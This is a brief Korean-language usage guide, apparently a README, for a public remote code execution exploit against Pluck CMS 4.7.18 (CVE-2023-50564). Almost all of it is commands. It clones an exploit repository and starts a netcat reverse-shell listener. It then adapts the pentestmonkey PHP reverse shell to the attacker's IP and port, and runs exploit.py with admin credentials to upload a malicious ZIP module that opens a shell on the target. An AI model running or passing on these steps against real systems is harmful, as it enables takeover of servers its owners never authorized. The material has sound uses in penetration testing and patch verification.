
Pluck v4.7.18 - 원격 코드 실행 (RCE)
이 익스플로잇은 Pluck CMS v4.7.18에서 인증된 관리자가 PHP 셸을 포함한 악성 ZIP 모듈을 업로드하여 원격 코드 실행(RCE)을 가능하게 합니다.
installmodule 엔드포인트에 모듈을 업로드합니다.git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <대상> -u <사용자이름> -pass <비밀번호> -path <PHP_셸_경로> [-p <포트>]
먼저, 공격자 머신에서 리버스 셸 리스너를 시작해야 합니다 (이 터미널 탭은 종료하지 마세요):
nc -nvlp <포트 지정>
그런 다음, https://github.com/pentestmonkey/php-reverse-shell 에서 PHP 리버스 셸을 다운로드하여 공격자 머신에 맞게 수정합니다 (IP, 포트).
다른 탭에서 익스플로잇 코드를 실행합니다:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php